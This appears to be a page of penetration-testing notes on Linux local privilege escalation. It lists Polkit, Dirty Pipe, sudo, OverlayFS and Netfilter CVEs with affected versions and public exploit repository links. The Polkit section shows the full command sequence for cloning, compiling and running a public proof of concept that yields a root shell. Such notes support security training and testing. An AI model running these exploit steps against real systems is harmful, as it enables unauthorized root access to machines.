Critical Vulnerabilities

Polkit (CVE-2021-4034)

#pkexec has assigned setuid means is vulnerable
cry0l1t3@nix02:~$  ls -la /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 Aug 16  2019 /usr/bin/pkexec

cry0l1t3@nix02:~$ git clone https://github.com/arthepsy/CVE-2021-4034.git
cry0l1t3@nix02:~$ cd CVE-2021-4034
cry0l1t3@nix02:~$ gcc cve-2021-4034-poc.c -o poc -static
cry0l1t3@nix02:~$ ./poc
# id
uid=0(root) gid=0(root) groups=0(root)

Dirty Pipe (CVE-2022-0847)

All kernels from version 5.8 to 5.17 are affected and vulnerable to this vulnerability.

Sudo privilege escalation

CVE-2021-3156

One of the latest vulnerabilities for sudo carries the CVE-2021-3156 and is based on a heap-based buffer overflow vulnerability. This affected the sudo versions:

  • 1.8.31 - Ubuntu 20.04

  • 1.8.27 - Debian 10

  • 1.9.2 - Fedora 33

  • and others

https://github.com/blasty/CVE-2021-3156

Sudo versions prior to 1.8.28 are affected.

Ubuntu OverlayFS Local Privesc CVE-2021-3493

Affected Version

  • Ubuntu 20.10

  • Ubuntu 20.04 LTS

  • Ubuntu 19.04

  • Ubuntu 18.04 LTS

  • Ubuntu 16.04 LTS

  • Ubuntu 14.04 ESM

Netfilter

CVE-2021-22555

Vulnerable kernel versions: 2.6 - 5.11

CVE-2022-25636

A recent vulnerability is CVE-2022-25636 and affects Linux kernel 5.4 through 5.6.10.

CVE-2023-32233

This vulnerability exploits the so called anonymous sets in nf_tables by using the Use-After-Free vulnerability in the Linux Kernel up to version 6.3.1.

Last updated